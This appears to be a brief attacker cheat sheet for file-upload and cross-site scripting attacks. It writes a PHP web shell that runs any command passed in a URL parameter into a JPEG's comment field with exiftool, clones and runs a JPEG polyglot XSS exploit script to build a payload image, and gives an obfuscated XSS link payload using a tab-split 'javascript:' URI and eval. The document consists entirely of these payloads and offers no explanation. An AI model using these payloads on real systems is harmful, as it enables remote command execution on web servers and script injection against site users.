exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' evil.jpeg
git clone https://github.com/simplylu/jpeg_polyglot_xss.git
python3 exploit.py -i test.png -o test_payload.png -pf payload
#Payload
<A href="javascrip%09t:eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here